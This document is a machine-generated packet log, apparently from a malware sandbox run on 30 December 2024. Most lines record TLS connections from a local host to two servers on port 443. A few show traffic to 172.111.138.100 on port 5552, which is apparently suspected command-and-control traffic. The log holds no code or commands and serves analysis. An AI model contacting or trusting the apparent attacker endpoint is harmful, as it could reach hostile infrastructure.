                                                                                                                      Dec 30, 2024 11:41:03.494357109 CET50033443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:41:03.495024920 CET44350033142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:03.495353937 CET50033443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:41:03.497323036 CET50033443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:41:03.497328997 CET44350033142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:03.497616053 CET44350033142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:03.497704029 CET50033443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:41:03.498114109 CET50033443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:41:03.537058115 CET44350034142.250.185.65192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:03.537605047 CET50034443192.168.2.6142.250.185.65
                                                                                                                      Dec 30, 2024 11:41:03.539335012 CET44350033142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:03.543960094 CET50034443192.168.2.6142.250.185.65
                                                                                                                      Dec 30, 2024 11:41:03.543972015 CET44350034142.250.185.65192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:03.544358969 CET50034443192.168.2.6142.250.185.65
                                                                                                                      Dec 30, 2024 11:41:03.544364929 CET44350034142.250.185.65192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:03.782797098 CET44350031142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:03.784003019 CET44350031142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:03.784142017 CET50031443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:41:03.869379997 CET44350033142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:03.869499922 CET50033443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:41:03.869529963 CET44350033142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:03.869570971 CET50033443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:41:03.871364117 CET44350033142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:03.871414900 CET44350033142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:03.871459961 CET50033443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:41:03.871479988 CET50033443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:41:03.949712038 CET44350032142.250.185.65192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:03.949764967 CET44350032142.250.185.65192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:03.949835062 CET50032443192.168.2.6142.250.185.65
                                                                                                                      Dec 30, 2024 11:41:03.949862003 CET44350032142.250.185.65192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:03.949886084 CET44350032142.250.185.65192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:03.949903011 CET50032443192.168.2.6142.250.185.65
                                                                                                                      Dec 30, 2024 11:41:03.949939013 CET50032443192.168.2.6142.250.185.65
                                                                                                                      Dec 30, 2024 11:41:03.956413031 CET44350034142.250.185.65192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:03.956465960 CET44350034142.250.185.65192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:03.956537008 CET50034443192.168.2.6142.250.185.65
                                                                                                                      Dec 30, 2024 11:41:03.956547022 CET44350034142.250.185.65192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:03.956593990 CET44350034142.250.185.65192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:03.956643105 CET50034443192.168.2.6142.250.185.65
                                                                                                                      Dec 30, 2024 11:41:04.182023048 CET50031443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:41:04.182064056 CET44350031142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:04.183382988 CET50045443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:41:04.183438063 CET44350045142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:04.183552027 CET50045443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:41:04.184009075 CET50045443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:41:04.184020996 CET44350045142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:04.191488981 CET50033443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:41:04.191523075 CET44350033142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:04.194601059 CET50046443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:41:04.194643021 CET44350046142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:04.194865942 CET50046443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:41:04.195214033 CET50046443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:41:04.195229053 CET44350046142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:04.198555946 CET50032443192.168.2.6142.250.185.65
                                                                                                                      Dec 30, 2024 11:41:04.198579073 CET44350032142.250.185.65192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:04.199726105 CET50047443192.168.2.6142.250.185.65
                                                                                                                      Dec 30, 2024 11:41:04.199736118 CET44350047142.250.185.65192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:04.199970961 CET50047443192.168.2.6142.250.185.65
                                                                                                                      Dec 30, 2024 11:41:04.200268984 CET50034443192.168.2.6142.250.185.65
                                                                                                                      Dec 30, 2024 11:41:04.200274944 CET44350034142.250.185.65192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:04.200998068 CET50047443192.168.2.6142.250.185.65
                                                                                                                      Dec 30, 2024 11:41:04.201009989 CET44350047142.250.185.65192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:04.201833963 CET50048443192.168.2.6142.250.185.65
                                                                                                                      Dec 30, 2024 11:41:04.201869011 CET44350048142.250.185.65192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:04.201941967 CET50048443192.168.2.6142.250.185.65
                                                                                                                      Dec 30, 2024 11:41:04.202218056 CET50048443192.168.2.6142.250.185.65
                                                                                                                      Dec 30, 2024 11:41:04.202229977 CET44350048142.250.185.65192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:04.783351898 CET44350045142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:04.783417940 CET50045443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:41:04.783890963 CET50045443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:41:04.783905029 CET44350045142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:04.784089088 CET50045443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:41:04.784095049 CET44350045142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:04.802270889 CET44350048142.250.185.65192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:04.802402020 CET50048443192.168.2.6142.250.185.65
                                                                                                                      Dec 30, 2024 11:41:04.806696892 CET50048443192.168.2.6142.250.185.65
                                                                                                                      Dec 30, 2024 11:41:04.806704044 CET44350048142.250.185.65192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:04.807837009 CET50048443192.168.2.6142.250.185.65
                                                                                                                      Dec 30, 2024 11:41:04.807849884 CET44350048142.250.185.65192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:04.811346054 CET44350047142.250.185.65192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:04.812696934 CET50047443192.168.2.6142.250.185.65
                                                                                                                      Dec 30, 2024 11:41:04.815588951 CET50047443192.168.2.6142.250.185.65
                                                                                                                      Dec 30, 2024 11:41:04.815597057 CET44350047142.250.185.65192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:04.815798044 CET50047443192.168.2.6142.250.185.65
                                                                                                                      Dec 30, 2024 11:41:04.815804005 CET44350047142.250.185.65192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:04.816493988 CET44350046142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:04.816577911 CET50046443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:41:04.816898108 CET50046443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:41:04.816901922 CET44350046142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:04.817035913 CET50046443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:41:04.817039967 CET44350046142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:05.149841070 CET44350045142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:05.149916887 CET50045443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:41:05.149956942 CET44350045142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:05.150000095 CET50045443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:41:05.150055885 CET50045443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:41:05.150101900 CET44350045142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:05.150247097 CET44350045142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:05.150293112 CET50045443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:41:05.150310993 CET50045443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:41:05.150968075 CET50058443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:41:05.150988102 CET44350058142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:05.151072979 CET50058443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:41:05.151465893 CET50058443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:41:05.151473045 CET44350058142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:05.195014954 CET44350046142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:05.195333004 CET50046443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:41:05.195341110 CET44350046142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:05.196222067 CET44350046142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:05.196351051 CET50046443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:41:05.196542025 CET50046443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:41:05.204978943 CET50046443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:41:05.204986095 CET44350046142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:05.205533981 CET50061443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:41:05.205584049 CET44350061142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:05.205955029 CET50061443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:41:05.206248999 CET50061443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:41:05.206262112 CET44350061142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:05.222033978 CET44350048142.250.185.65192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:05.222079039 CET44350048142.250.185.65192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:05.222167015 CET44350048142.250.185.65192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:05.222208023 CET50048443192.168.2.6142.250.185.65
                                                                                                                      Dec 30, 2024 11:41:05.222208023 CET50048443192.168.2.6142.250.185.65
                                                                                                                      Dec 30, 2024 11:41:05.222208023 CET50048443192.168.2.6142.250.185.65
                                                                                                                      Dec 30, 2024 11:41:05.222876072 CET50048443192.168.2.6142.250.185.65
                                                                                                                      Dec 30, 2024 11:41:05.222898006 CET44350048142.250.185.65192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:05.223396063 CET50062443192.168.2.6142.250.185.65
                                                                                                                      Dec 30, 2024 11:41:05.223427057 CET44350062142.250.185.65192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:05.223480940 CET50062443192.168.2.6142.250.185.65
                                                                                                                      Dec 30, 2024 11:41:05.223685026 CET50062443192.168.2.6142.250.185.65
                                                                                                                      Dec 30, 2024 11:41:05.223697901 CET44350062142.250.185.65192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:05.381704092 CET44350047142.250.185.65192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:05.381756067 CET44350047142.250.185.65192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:05.381763935 CET50047443192.168.2.6142.250.185.65
                                                                                                                      Dec 30, 2024 11:41:05.381776094 CET44350047142.250.185.65192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:05.381829023 CET50047443192.168.2.6142.250.185.65
                                                                                                                      Dec 30, 2024 11:41:05.381829023 CET50047443192.168.2.6142.250.185.65
                                                                                                                      Dec 30, 2024 11:41:05.381836891 CET44350047142.250.185.65192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:05.381906033 CET50047443192.168.2.6142.250.185.65
                                                                                                                      Dec 30, 2024 11:41:05.382520914 CET50047443192.168.2.6142.250.185.65
                                                                                                                      Dec 30, 2024 11:41:05.382564068 CET44350047142.250.185.65192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:05.382617950 CET50047443192.168.2.6142.250.185.65
                                                                                                                      Dec 30, 2024 11:41:05.382997990 CET50065443192.168.2.6142.250.185.65
                                                                                                                      Dec 30, 2024 11:41:05.383019924 CET44350065142.250.185.65192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:05.383065939 CET50065443192.168.2.6142.250.185.65
                                                                                                                      Dec 30, 2024 11:41:05.383339882 CET50065443192.168.2.6142.250.185.65
                                                                                                                      Dec 30, 2024 11:41:05.383352995 CET44350065142.250.185.65192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:05.750211000 CET44350058142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:05.750519991 CET50058443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:41:05.750967026 CET44350058142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:05.751055002 CET50058443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:41:05.754496098 CET50058443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:41:05.754502058 CET44350058142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:05.754741907 CET44350058142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:05.754874945 CET50058443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:41:05.755251884 CET50058443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:41:05.799321890 CET44350058142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:05.806390047 CET44350061142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:05.806612968 CET50061443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:41:05.807145119 CET44350061142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:05.807585001 CET50061443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:41:05.808696032 CET50061443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:41:05.808706999 CET44350061142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:05.808952093 CET44350061142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:05.812220097 CET50061443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:41:05.812650919 CET50061443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:41:05.823362112 CET44350062142.250.185.65192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:05.823472977 CET50062443192.168.2.6142.250.185.65
                                                                                                                      Dec 30, 2024 11:41:05.827259064 CET50062443192.168.2.6142.250.185.65
                                                                                                                      Dec 30, 2024 11:41:05.827275991 CET44350062142.250.185.65192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:05.827701092 CET44350062142.250.185.65192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:05.827857971 CET50062443192.168.2.6142.250.185.65
                                                                                                                      Dec 30, 2024 11:41:05.829586029 CET50062443192.168.2.6142.250.185.65
                                                                                                                      Dec 30, 2024 11:41:05.859344959 CET44350061142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:05.875334024 CET44350062142.250.185.65192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:05.880738020 CET50065443192.168.2.6142.250.185.65
                                                                                                                      Dec 30, 2024 11:41:05.880842924 CET50058443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:41:05.880850077 CET50061443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:41:05.880938053 CET50062443192.168.2.6142.250.185.65
                                                                                                                      Dec 30, 2024 11:41:05.882193089 CET50071443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:41:05.882220030 CET44350071142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:05.882960081 CET50072443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:41:05.882996082 CET44350072142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:05.883023024 CET50071443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:41:05.883157015 CET50072443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:41:05.883307934 CET50071443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:41:05.883323908 CET44350071142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:05.883943081 CET50072443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:41:05.883965969 CET44350072142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:06.413079023 CET500735552192.168.2.6172.111.138.100
                                                                                                                      Dec 30, 2024 11:41:06.418025017 CET555250073172.111.138.100192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:06.418507099 CET500735552192.168.2.6172.111.138.100
                                                                                                                      Dec 30, 2024 11:41:06.418992043 CET500735552192.168.2.6172.111.138.100
                                                                                                                      Dec 30, 2024 11:41:06.423983097 CET555250073172.111.138.100192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:06.487075090 CET44350071142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:06.492340088 CET50071443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:41:06.492340088 CET50071443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:41:06.492369890 CET44350071142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:06.492803097 CET50071443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:41:06.492809057 CET44350071142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:06.503237009 CET44350072142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:06.503348112 CET50072443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:41:06.504848957 CET50072443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:41:06.504862070 CET44350072142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:06.505686998 CET50072443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:41:06.505695105 CET44350072142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:06.872812986 CET44350071142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:06.872895956 CET44350071142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:06.872987032 CET50071443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:41:06.876946926 CET44350072142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:06.877914906 CET44350072142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:06.878005028 CET50072443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:41:06.946213961 CET50071443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:41:06.946261883 CET44350071142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:06.947303057 CET50079443192.168.2.6142.250.185.65
                                                                                                                      Dec 30, 2024 11:41:06.947362900 CET44350079142.250.185.65192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:06.947803974 CET50080443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:41:06.947818995 CET50079443192.168.2.6142.250.185.65
                                                                                                                      Dec 30, 2024 11:41:06.947846889 CET44350080142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:06.947913885 CET50080443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:41:06.949913979 CET50080443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:41:06.949934006 CET44350080142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:06.950782061 CET50072443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:41:06.950782061 CET50072443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:41:06.950807095 CET44350072142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:06.951189041 CET50072443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:41:06.951440096 CET50081443192.168.2.6142.250.185.65
                                                                                                                      Dec 30, 2024 11:41:06.951466084 CET44350081142.250.185.65192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:06.951576948 CET50081443192.168.2.6142.250.185.65
                                                                                                                      Dec 30, 2024 11:41:06.951690912 CET50082443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:41:06.951697111 CET44350082142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:06.951745987 CET50082443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:41:06.951942921 CET50082443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:41:06.951956034 CET44350082142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:06.982959986 CET50079443192.168.2.6142.250.185.65
                                                                                                                      Dec 30, 2024 11:41:06.983006954 CET44350079142.250.185.65192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:06.983407974 CET50081443192.168.2.6142.250.185.65
                                                                                                                      Dec 30, 2024 11:41:06.983434916 CET44350081142.250.185.65192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:07.548305035 CET44350080142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:07.548391104 CET50080443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:41:07.548885107 CET50080443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:41:07.548896074 CET44350080142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:07.550693035 CET50080443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:41:07.550698042 CET44350080142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:07.564717054 CET44350082142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:07.564768076 CET50082443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:41:07.565188885 CET50082443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:41:07.565192938 CET44350082142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:07.565404892 CET50082443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:41:07.565408945 CET44350082142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:07.583327055 CET44350079142.250.185.65192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:07.583417892 CET50079443192.168.2.6142.250.185.65
                                                                                                                      Dec 30, 2024 11:41:07.585098982 CET50079443192.168.2.6142.250.185.65
                                                                                                                      Dec 30, 2024 11:41:07.585108042 CET44350079142.250.185.65192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:07.587913036 CET50079443192.168.2.6142.250.185.65
                                                                                                                      Dec 30, 2024 11:41:07.587918043 CET44350079142.250.185.65192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:07.591900110 CET44350081142.250.185.65192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:07.591986895 CET50081443192.168.2.6142.250.185.65
                                                                                                                      Dec 30, 2024 11:41:07.681509018 CET50081443192.168.2.6142.250.185.65
                                                                                                                      Dec 30, 2024 11:41:07.681540012 CET44350081142.250.185.65192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:07.681710958 CET50081443192.168.2.6142.250.185.65
                                                                                                                      Dec 30, 2024 11:41:07.681716919 CET44350081142.250.185.65192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:07.785939932 CET804975169.42.215.252192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:07.786005974 CET4975180192.168.2.669.42.215.252
                                                                                                                      Dec 30, 2024 11:41:07.924566031 CET44350080142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:07.924824953 CET50080443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:41:07.924861908 CET44350080142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:07.925287962 CET50080443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:41:07.925441027 CET44350080142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:07.925483942 CET44350080142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:07.925492048 CET50080443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:41:07.925534964 CET50080443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:41:07.925635099 CET50080443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:41:07.925652981 CET44350080142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:07.925666094 CET50080443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:41:07.925748110 CET50080443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:41:07.928002119 CET50089443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:41:07.928066015 CET44350089142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:07.928168058 CET50089443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:41:07.928586006 CET50089443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:41:07.928600073 CET44350089142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:07.994782925 CET44350079142.250.185.65192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:07.994831085 CET44350079142.250.185.65192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:07.994875908 CET50079443192.168.2.6142.250.185.65
                                                                                                                      Dec 30, 2024 11:41:07.994891882 CET44350079142.250.185.65192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:07.994911909 CET50079443192.168.2.6142.250.185.65
                                                                                                                      Dec 30, 2024 11:41:07.994930029 CET50079443192.168.2.6142.250.185.65
                                                                                                                      Dec 30, 2024 11:41:07.994935036 CET44350079142.250.185.65192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:07.994955063 CET44350079142.250.185.65192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:07.994980097 CET50079443192.168.2.6142.250.185.65
                                                                                                                      Dec 30, 2024 11:41:07.994996071 CET50079443192.168.2.6142.250.185.65
                                                                                                                      Dec 30, 2024 11:41:07.995978117 CET50079443192.168.2.6142.250.185.65
                                                                                                                      Dec 30, 2024 11:41:07.995990992 CET44350079142.250.185.65192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:07.996526003 CET50091443192.168.2.6142.250.185.65
                                                                                                                      Dec 30, 2024 11:41:07.996547937 CET44350091142.250.185.65192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:07.996617079 CET50091443192.168.2.6142.250.185.65
                                                                                                                      Dec 30, 2024 11:41:07.996870041 CET50091443192.168.2.6142.250.185.65
                                                                                                                      Dec 30, 2024 11:41:07.996885061 CET44350091142.250.185.65192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:08.025120020 CET44350082142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:08.025304079 CET50082443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:41:08.025331020 CET44350082142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:08.025377989 CET50082443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:41:08.025819063 CET44350082142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:08.025867939 CET44350082142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:08.025893927 CET50082443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:41:08.025904894 CET50082443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:41:08.026010990 CET50082443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:41:08.026025057 CET44350082142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:08.027224064 CET50093443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:41:08.027265072 CET44350093142.250.185.78192.168.2.6
                                                                                                                      Dec 30, 2024 11:41:08.027332067 CET50093443192.168.2.6142.250.185.78
                                                                                                                      Dec 30, 2024 11:41:08.027939081 CET50093443192.168.2.6142.250.185.78
